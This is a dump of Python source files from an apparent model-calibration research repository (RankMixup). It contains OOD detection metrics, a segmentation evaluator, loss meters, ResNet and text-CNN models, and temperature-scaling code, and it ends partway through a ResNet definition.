ax3.set_title("%s\n- %s -" % (self.metric.upper(), title_suffix))
else:
ax1.set_title("Average accuracy")
ax2.set_title("Average confidence")
ax3.set_title("%s" % self.metric.upper())
# -----------------------------------------------------------------------------------------
return fig | 58,000 | Python | .py | 974 | 48.472279 | 175 | 0.621711 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,893 | ood_test_utils.py | cvlab-yonsei_RankMixup/calibrate/evaluation/ood_test_utils.py | # Utility functions to get OOD detection ROC curves and AUROC scores
# Ideally should be agnostic of model architectures
import torch
import torch.nn.functional as F
from sklearn import metrics
def entropy(net_output):
p = F.softmax(net_output, dim=1)
logp = F.log_softmax(net_output, dim=1)
plogp = p * logp
entropy = - torch.sum(plogp, dim=1)
return entropy
def confidence(net_output):
p = F.softmax(net_output, dim=1)
confidence, _ = torch.max(p, dim=1)
return confidence
def get_roc_auc(net, test_loader, ood_test_loader, device):
bin_labels_entropies = None
bin_labels_confidences = None
entropies = None
confidences = None
net.eval()
with torch.no_grad():
# Getting entropies for in-distribution data
for i, (data, label) in enumerate(test_loader):
data = data.to(device)
label = label.to(device)
bin_label_entropy = torch.zeros(label.shape).to(device)
bin_label_confidence = torch.ones(label.shape).to(device)
net_output = net(data)
entrop = entropy(net_output)
conf = confidence(net_output)
if (i == 0):
bin_labels_entropies = bin_label_entropy
bin_labels_confidences = bin_label_confidence
entropies = entrop
confidences = conf
else:
bin_labels_entropies = torch.cat((bin_labels_entropies, bin_label_entropy))
bin_labels_confidences = torch.cat((bin_labels_confidences, bin_label_confidence))
entropies = torch.cat((entropies, entrop))
confidences = torch.cat((confidences, conf))
b, c, h, w = data.shape
# Getting entropies for OOD data
for i, (data, label) in enumerate(ood_test_loader):
data = F.interpolate(data, size=(h, w), mode='bilinear')
data = data.to(device)
label = label.to(device)
#data += noise.to(device)
bin_label_entropy = torch.ones(label.shape).to(device)
bin_label_confidence = torch.zeros(label.shape).to(device)
net_output = net(data)
entrop = entropy(net_output)
conf = confidence(net_output)
bin_labels_entropies = torch.cat((bin_labels_entropies, bin_label_entropy))
bin_labels_confidences = torch.cat((bin_labels_confidences, bin_label_confidence))
entropies = torch.cat((entropies, entrop))
confidences = torch.cat((confidences, conf))
fpr_entropy, tpr_entropy, thresholds_entropy = metrics.roc_curve(bin_labels_entropies.cpu().numpy(), entropies.cpu().numpy())
fpr_confidence, tpr_confidence, thresholds_confidence = metrics.roc_curve(bin_labels_confidences.cpu().numpy(), confidences.cpu().numpy())
auc_entropy = metrics.roc_auc_score(bin_labels_entropies.cpu().numpy(), entropies.cpu().numpy())
auc_confidence = metrics.roc_auc_score(bin_labels_confidences.cpu().numpy(), confidences.cpu().numpy())
# return (bin_labels_confidences.cpu().numpy(), confidences.cpu().numpy()), (bin_labels_entropies.cpu().numpy(), entropies.cpu().numpy()), (fpr_entropy, tpr_entropy, thresholds_entropy), (fpr_confidence, tpr_confidence, thresholds_confidence), auc_entropy, auc_confidence
return (bin_labels_confidences.cpu().numpy(), confidences.cpu().numpy()), (bin_labels_entropies.cpu().numpy(), entropies.cpu().numpy())
| 3,479 | Python | .py | 63 | 45.873016 | 276 | 0.649794 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,894 | segment_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/segment_evaluator.py | import logging
import numpy as np
from terminaltables import AsciiTable
import pandas as pd
from typing import List, Optional
import wandb
from .evaluator import DatasetEvaluator
from calibrate.utils.constants import EPS
logger = logging.getLogger(__name__)
def intersect_and_union(pred_label, label, num_classes, ignore_index):
mask = (label != ignore_index)
pred_label = pred_label[mask]
label = label[mask]
intersect = pred_label[pred_label == label]
area_intersect, _ = np.histogram(
intersect, bins=np.arange(num_classes + 1)
)
area_pred_label, _ = np.histogram(
pred_label, bins=np.arange(num_classes + 1)
)
area_label, _ = np.histogram(
label, bins=np.arange(num_classes + 1)
)
area_union = area_pred_label + area_label - area_intersect
return area_intersect, area_union, area_pred_label, area_label
class SegmentEvaluator(DatasetEvaluator):
def __init__(self,
classes: Optional[List[str]] = None,
ignore_index: int = -1) -> None:
super().__init__()
self.classes = classes
self.num_classes = len(self.classes)
self.ignore_index = ignore_index
def num_samples(self):
return self.nsamples
def reset(self):
self.total_area_inter = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_union = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_pred = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_target = np.zeros((self.num_classes, ), dtype=np.float)
self.nsamples = 0
def main_metric(self):
return "miou"
def ignore_background(self, pred: np.ndarray, target: np.ndarray):
pred = pred[:, 1:] if pred.shape[1] > 1 else pred
target = target[:, 1:] if target.shape[1] > 1 else target
return pred, target
def update(self, pred: np.ndarray, target: np.ndarray):
"""Update all the metric from batch size prediction and target.
Args:
pred: predictions to be evaluated in one-hot formation
y: ground truth. It should be one-hot format.
"""
assert pred.shape == target.shape, "pred and target should have same shapes"
n = pred.shape[0]
self.nsamples += n
batch_area_inter = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_union = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_pred = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_target = np.zeros((self.num_classes, ), dtype=np.float)
for i in range(n):
area_inter, area_union, area_pred, area_target = (
intersect_and_union(
pred[i], target[i], self.num_classes, self.ignore_index
)
)
batch_area_inter += area_inter
batch_area_union += area_union
batch_area_pred += area_pred
batch_area_target += area_target
iou = batch_area_inter[1:].sum() / (batch_area_union[1:].sum() + EPS)
self.curr = {"iou": iou}
# update the total
self.total_area_inter += batch_area_inter
self.total_area_union += batch_area_union
self.total_area_pred += batch_area_pred
self.total_area_target += batch_area_target
def curr_score(self):
return self.curr
def mean_score(self, main=False):
mdice = (
2 * self.total_area_inter[1:]
/ (self.total_area_pred[1:] + self.total_area_target[1:] + EPS)
).mean()
miou = (
self.total_area_inter[1:] / (self.total_area_union[1:] + EPS)
).mean()
macc = (
self.total_area_inter[1:] / (self.total_area_target[1:] + EPS)
).mean()
if main:
return miou
else:
return {"mdsc": mdice, "miou": miou, "macc": macc}
def class_score(self, print=True, return_dataframe=False):
class_acc = self.total_area_inter[1:] / (self.total_area_target[1:] + EPS)
class_dice = (
2 * self.total_area_inter[1:]
/ (self.total_area_pred[1:] + self.total_area_target[1:] + EPS)
)
class_iou = self.total_area_inter[1:] / (self.total_area_union[1:] + EPS)
columns = ["id", "Class", "iou", "dsc", "acc"]
class_table_data = [columns]
for i in range(class_acc.shape[0]):
class_table_data.append(
[i] + [self.classes[i + 1]]
+ ["{:.4f}".format(class_iou[i])]
+ ["{:.4f}".format(class_dice[i])]
+ ["{:.4f}".format(class_acc[i])]
)
class_table_data.append(
[""] + ["mean"]
+ ["{:.4f}".format(np.mean(class_iou))]
+ ["{:.4f}".format(np.mean(class_dice))]
+ ["{:.4f}".format(np.mean(class_acc))]
)
if print:
table = AsciiTable(class_table_data)
logger.info("\n" + table.table)
if return_dataframe:
data = {key: [] for key in columns}
for i in range(class_acc.shape[0]):
data[columns[0]].append(i)
data[columns[1]].append(self.classes[i + 1])
data[columns[2]].append(class_iou[i])
data[columns[3]].append(class_dice[i])
data[columns[4]].append(class_acc[i])
data[columns[0]].append(None)
data[columns[1]].append("mean")
data[columns[2]].append(np.mean(class_iou))
data[columns[3]].append(np.mean(class_dice))
data[columns[4]].append(np.mean(class_acc))
return pd.DataFrame(data, columns=columns)
def wandb_score_table(self):
table_data = self.class_score(print=False, return_dataframe=True)
return wandb.Table(dataframe=table_data)
| 5,903 | Python | .py | 136 | 33.720588 | 84 | 0.578865 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,895 | meter.py | cvlab-yonsei_RankMixup/calibrate/evaluation/meter.py | import numpy as np
import torch
from typing import Dict, Optional, List
class AverageMeter:
"""Computes and stores the average and current value"""
def __init__(self) -> None:
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def reset(self) -> None:
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val: float, n: int = 1) -> None:
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class LossMeter:
"""A class wrapper to record the values of a loss function.
Support loss function with mutiple returning terms [num_terms]
"""
def __init__(self, num_terms: int = 1, names: Optional[List] = None) -> None:
self.num_terms = num_terms
self.names = (
names if names is not None
else ["loss" if i == 0 else "loss_" + str(i) for i in range(self.num_terms)]
)
self.meters = [AverageMeter() for _ in range(self.num_terms)]
def reset(self):
for meter in self.meters:
meter.reset()
def avg(self, index=None):
if index is None:
ret = {}
for name, meter in zip(self.names, self.meters):
ret[name] = meter.avg
return ret
else:
return self.meters[index].avg
def update(self, val, n: int = 1):
if not isinstance(val, tuple):
val = [val]
for x, meter in zip(val, self.meters):
if isinstance(x, torch.Tensor):
x = x.item()
meter.update(x, n)
def get_vals(self) -> Dict:
ret = {}
for name, meter in zip(self.names, self.meters):
ret[name] = meter.val
return ret
def print_status(self) -> str:
ret = []
for name, meter in zip(self.names, self.meters):
ret.append("{} {:.4f} ({:.4f})".format(name, meter.val, meter.avg))
return "\t".join(ret)
def get_avgs(self) -> Dict:
ret = {}
for name, meter in zip(self.names, self.meters):
ret[name] = meter.avg
return ret
def print_avg(self) -> str:
ret = []
for name, meter in zip(self.names, self.meters):
ret.append("{} {:.4f}".format(name, meter.avg))
return "\t".join(ret)
def logit_stats(batch):
#mean = batch.cpu().data.numpy().mean()
np.argsort(np.max(batch.cpu().data.numpy(), axis=1))
batch_numpy = batch.cpu().data.numpy()
maxValuesPos = batch_numpy.argmax(axis=1)
maxValuesA = batch_numpy.max(axis=1)
### TODO: Improve this
for i in range(len(maxValuesPos)):
batch_numpy[i][maxValuesPos[i]]=-10
maxValuesB = batch_numpy.max(axis=1)
absDif = maxValuesA-maxValuesB
meanOfMax = absDif.mean()
absDifMax = np.amax(absDif)
return meanOfMax, absDifMax
def logit_stats_v2(batch):
#mean = batch.cpu().data.numpy().mean()
minValues = batch.cpu().data.numpy().min(axis=1)
maxValues = batch.cpu().data.numpy().max(axis=1)
absDif = maxValues-minValues
absDifMax = np.amax(absDif)
meanOfMax = absDif.mean()
allDiff = np.zeros((batch.cpu().data.numpy().shape))
for i in range(allDiff.shape[1]):
allDiff[:, i] = maxValues - batch.cpu().data.numpy()[:, i]
return meanOfMax, absDifMax, absDif, allDiff
def logit_diff(batch):
minValues = batch.cpu().data.numpy().min(axis=1)
maxValues = batch.cpu().data.numpy().max(axis=1)
all_diff = maxValues - minValues
max_diff = np.amax(all_diff)
min_diff = np.amin(all_diff)
mean_diff = all_diff.mean()
return all_diff, max_diff, min_diff, mean_diff
| 3,745 | Python | .py | 102 | 29.029412 | 88 | 0.588154 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,896 | ng_model.py | cvlab-yonsei_RankMixup/calibrate/net/ng_model.py | import torch
import torch.nn as nn
import torch.nn.functional as F
class GlobalPoolingCNN(nn.Module):
def __init__(self, keep_prob=0.5, temp=1.0, num_classes=20):
super(GlobalPoolingCNN, self).__init__()
self.num_classes = num_classes
self.conv1 = nn.Conv1d(in_channels=100, out_channels=128, kernel_size=5, stride=1, padding=0)
self.conv2 = nn.Conv1d(in_channels=128, out_channels=128, kernel_size=5, stride=1, padding=0)
self.conv3 = nn.Conv1d(in_channels=128, out_channels=128, kernel_size=5, stride=1, padding=0)
self.fc1 = nn.Linear(128, 128)
self.fc2 = nn.Linear(128, self.num_classes)
# self.dropout = nn.Dropout(p=1-keep_prob)
self.temp = temp
def forward(self, x): #x: batchsize x step x 100
out = F.relu(self.conv1(x.transpose(1,2)))
out = F.max_pool1d(out, kernel_size=5, stride=1)
out = F.relu(self.conv2(out))
out = F.max_pool1d(out, kernel_size=5, stride=1)
out = F.relu(self.conv3(out))
# batch x step x feature_size
# now global max pooling layer
out, _ = torch.max(out, dim=2) #The number of channels are preserved to be 128 and max is along step
# out = self.dropout(F.relu(self.fc1(out)))
out = F.relu(self.fc1(out))
out = self.fc2(out) / self.temp
return out
| 1,359 | Python | .py | 27 | 42.666667 | 108 | 0.637321 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,897 | resnet_cifar.py | cvlab-yonsei_RankMixup/calibrate/net/resnet_cifar.py | '''
Pytorch implementation of ResNet models.
Reference:
[1] He, K., Zhang, X., Ren, S., Sun, J.: Deep residual learning for image recognition. In: CVPR, 2016.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, num_blocks, num_classes=10, temp=1.0):
super(ResNet, self).__init__()
self.in_planes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
self.fc = nn.Linear(512*block.expansion, num_classes)
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.temp = temp
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward_feature(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
return out
def forward_logit(self, x):
x = F.relu(self.bn1(self.conv1(x)))
# x = self.maxpool(x)
x_level = []
x = self.layer1(x)
x_level.append(x)
x = self.layer2(x)
x_level.append(x)
x = self.layer3(x)
x_level.append(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
logits = []
for i in range(3):
x_logit = self.avgpool(x_level[i])
x_logit = x_logit.view(x_logit.size(0), -1)
logits.append(x_logit)
logits.append(x)
# x = self.fc(x) / self.temp
return logits
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.fc(out) / self.temp
return out
def resnet18(temp=1.0, **kwargs):
model = ResNet(BasicBlock, [2, 2, 2, 2], temp=temp, **kwargs)
return model
def resnet34(temp=1.0, **kwargs):
model = ResNet(BasicBlock, [3, 4, 6, 3], temp=temp, **kwargs)
return model
def resnet50(temp=1.0, **kwargs):
model = ResNet(Bottleneck, [3, 4, 6, 3], temp=temp, **kwargs)
return model
def resnet101(temp=1.0, **kwargs):
model = ResNet(Bottleneck, [3, 4, 23, 3], temp=temp, **kwargs)
return model
def resnet110(temp=1.0, **kwargs):
model = ResNet(Bottleneck, [3, 4, 26, 3], temp=temp, **kwargs)
return model
def resnet152(temp=1.0, **kwargs):
model = ResNet(Bottleneck, [3, 8, 36, 3], temp=temp, **kwargs)
return model
| 5,344 | Python | .py | 129 | 33.186047 | 102 | 0.601785 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,898 | temperature_scaling.py | cvlab-yonsei_RankMixup/calibrate/net/temperature_scaling.py | '''
Code to perform temperature scaling. Adapted from https://github.com/gpleiss/temperature_scaling
'''
import logging
import torch
import numpy as np
from torch import nn, optim
from torch.nn import functional as F
from calibrate.evaluation.metrics import ECELoss
logger = logging.getLogger(__name__)
class ModelWithTemperature(nn.Module):
"""
A thin decorator, which wraps a model with temperature scaling
model (nn.Module):
A classification neural network
NB: Output of the neural network should be the classification logits,
NOT the softmax (or log softmax)!
"""
def __init__(self, model, device="cuda:0", log=True):
super(ModelWithTemperature, self).__init__()
self.model = model
self.temperature = 1.0
self.log = log
self.device = device
def forward(self, input):
logits = self.model(input)
return self.temperature_scale(logits)
def temperature_scale(self, logits):
"""
Perform temperature scaling on logits
"""
# Expand temperature to match the size of logits
return logits / self.temperature
def set_temperature_ng(self, embedding_model, x_val, y_val,
cross_validate="ece",
batch_size=128):
self.model.eval()
embedding_model.eval()
nll_criterion = nn.CrossEntropyLoss().to(self.device)
ece_criterion = ECELoss().to(self.device)
# First: collect all the logits and labels for the validation set
logits_list = []
labels_list = []
batch_size = 128
with torch.no_grad():
for i in range(1 + x_val.shape[0]//batch_size):
data = torch.from_numpy(
x_val[i*batch_size:min((i+1)*batch_size, x_val.shape[0])]
).type(torch.LongTensor).to(self.device)
labels = torch.from_numpy(
np.argmax(y_val[i*batch_size:min((i+1)*batch_size, x_val.shape[0])], 1)
).to(self.device)
emb = embedding_model(data)
logits = self.model(emb)
logits_list.append(logits)
labels_list.append(labels)
logits = torch.cat(logits_list).cuda()
labels = torch.cat(labels_list).cuda()
# Calculate NLL and ECE before temperature scaling
before_temperature_nll = nll_criterion(logits, labels).item()
before_temperature_ece = ece_criterion(logits, labels).item()
if self.log:
logger.info(
'Before temperature - NLL: {:.4f}, ECE: {:.4f}'.format(
before_temperature_nll, before_temperature_ece
)
)
nll_val = 10 ** 7
ece_val = 10 ** 7
T_opt_nll = 1.0
T_opt_ece = 1.0
T = 0.1
for i in range(100):
self.temperature = T
after_temperature_nll = nll_criterion(self.temperature_scale(logits), labels).item()
after_temperature_ece = ece_criterion(self.temperature_scale(logits), labels).item()
if nll_val > after_temperature_nll:
T_opt_nll = T
nll_val = after_temperature_nll
if ece_val > after_temperature_ece:
T_opt_ece = T
ece_val = after_temperature_ece
T += 0.1
if cross_validate == 'ece':
self.temperature = T_opt_ece
else:
self.temperature = T_opt_nll
# Calculate NLL and ECE after temperature scaling
after_temperature_nll = nll_criterion(self.temperature_scale(logits), labels).item()
after_temperature_ece = ece_criterion(self.temperature_scale(logits), labels).item()
if self.log:
logger.info(
'Optimal temperature: {:.3f}'.format(self.temperature)
)
logger.info(
'After temperature - NLL: {:.4f}, ECE: {:.4f}'.format(
after_temperature_nll, after_temperature_ece
)
)
def set_temperature(self,
valid_loader,
cross_validate='ece'):
"""
Tune the tempearature of the model (using the validation set) with cross-validation on ECE or NLL
"""
# self.cuda()
self.model.eval()
nll_criterion = nn.CrossEntropyLoss().to(self.device)
ece_criterion = ECELoss().to(self.device)
# First: collect all the logits and labels for the validation set
logits_list = []
labels_list = []
with torch.no_grad():
for input, label in valid_loader:
input = input.to(self.device)
logits = self.model(input)
logits_list.append(logits)
labels_list.append(label)
logits = torch.cat(logits_list).to(self.device)
labels = torch.cat(labels_list).to(self.device)
# Calculate NLL and ECE before temperature scaling
before_temperature_nll = nll_criterion(logits, labels).item()
before_temperature_ece = ece_criterion(logits, labels).item()
if self.log:
logger.info(
'Before temperature - NLL: {:.4f}, ECE: {:.4f}'.format(
before_temperature_nll, before_temperature_ece
)
)
nll_val = 10 ** 7
ece_val = 10 ** 7
T_opt_nll = 1.0
T_opt_ece = 1.0
T = 0.1
for i in range(100):
self.temperature = T
after_temperature_nll = nll_criterion(self.temperature_scale(logits), labels).item()
after_temperature_ece = ece_criterion(self.temperature_scale(logits), labels).item()
if nll_val > after_temperature_nll:
T_opt_nll = T
nll_val = after_temperature_nll
if ece_val > after_temperature_ece:
T_opt_ece = T
ece_val = after_temperature_ece
T += 0.1
if cross_validate == 'ece':
self.temperature = T_opt_ece
else:
self.temperature = T_opt_nll
# Calculate NLL and ECE after temperature scaling
after_temperature_nll = nll_criterion(self.temperature_scale(logits), labels).item()
after_temperature_ece = ece_criterion(self.temperature_scale(logits), labels).item()
if self.log:
logger.info(
'Optimal temperature: {:.3f}'.format(self.temperature)
)
logger.info(
'After temperature - NLL: {:.4f}, ECE: {:.4f}'.format(
after_temperature_nll, after_temperature_ece
)
)
def set_temperature_seg(self,
valid_loader,
cross_validate='nll'):
"""
Tune the tempearature of the model (using the validation set) with cross-validation on ECE or NLL
"""
# self.cuda()
self.model.eval()
nll_criterion = nn.CrossEntropyLoss().to(self.device)
ece_criterion = ECELoss().to(self.device)
# First: collect all the logits and labels for the validation set
logits_list = []
labels_list = []
with torch.no_grad():
for input, label in valid_loader:
input = input.to(self.device)
logits = self.model(input)
assert logits.shape[0] == label.shape[0]
n, c, x, y = logits.shape
logits = torch.einsum("ncxy->nxyc", logits)
logits = logits.reshape(n * x * y, -1)
label = label.reshape(n * x * y)
if 0 <= 255:
index = torch.nonzero(label != 255).squeeze()
logits = logits[index, :]
label = label[index]
# dismiss background
index = torch.nonzero(label != 0).squeeze()
logits = logits[index, :].to(self.device)
label = label[index].to(self.device)
logits_list.append(logits)
labels_list.append(label)
logits = torch.cat(logits_list).to(self.device)
labels = torch.cat(labels_list).to(self.device)
# Calculate NLL and ECE before temperature scaling
before_temperature_nll = nll_criterion(logits, labels).item()
before_temperature_ece = ece_criterion(logits, labels).item()
if self.log:
logger.info(
'Before temperature - NLL: {:.4f}, ECE: {:.4f}'.format(
before_temperature_nll, before_temperature_ece
)
)
nll_val = 10 ** 7
ece_val = 10 ** 7
T_opt_nll = 1.0
T_opt_ece = 1.0
T = 0.1
for i in range(100):
self.temperature = T
after_temperature_nll = nll_criterion(self.temperature_scale(logits), labels).item()
after_temperature_ece = ece_criterion(self.temperature_scale(logits), labels).item()
if nll_val > after_temperature_nll:
T_opt_nll = T
nll_val = after_temperature_nll
if ece_val > after_temperature_ece:
T_opt_ece = T
ece_val = after_temperature_ece
T += 0.1
if cross_validate == 'ece':
self.temperature = T_opt_ece
else:
self.temperature = T_opt_nll
# Calculate NLL and ECE after temperature scaling
after_temperature_nll = nll_criterion(self.temperature_scale(logits), labels).item()
after_temperature_ece = ece_criterion(self.temperature_scale(logits), labels).item()
if self.log:
logger.info(
'Optimal temperature: {:.3f}'.format(self.temperature)
)
logger.info(
'After temperature - NLL: {:.4f}, ECE: {:.4f}'.format(
after_temperature_nll, after_temperature_ece
)
)
def get_temperature(self):
return self.temperature
| 10,168 | Python | .py | 238 | 30.508403 | 105 | 0.556925 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,899 | resnet.py | cvlab-yonsei_RankMixup/calibrate/net/resnet.py | import torch
import torch.nn as nn
try:
from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
__all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',
'resnet152', 'resnext50_32x4d', 'resnext101_32x8d',
'wide_resnet50_2', 'wide_resnet101_2']
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',
'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',
'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',
'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',
}
def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None):
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
# Bottleneck in torchvision places the stride for downsampling at 3x3 convolution(self.conv2)
# while original implementation places the stride at the first 1x1 convolution(self.conv1)
# according to "Deep residual learning for image recognition"https://arxiv.org/abs/1512.03385.
# This variant is also known as ResNet V1.5 and improves accuracy according to
# https://ngc.nvidia.com/catalog/model-scripts/nvidia:resnet_50_v1_5_for_pytorch.
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None):
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
# Both self.conv2 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv1x1(inplanes, width)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups, dilation)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None,
has_dropout=True):
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.dilation = 1
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(512 * block.expansion, num_classes)
self.has_dropout = has_dropout
self.dropout = nn.Dropout(p=0.5, inplace=False)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
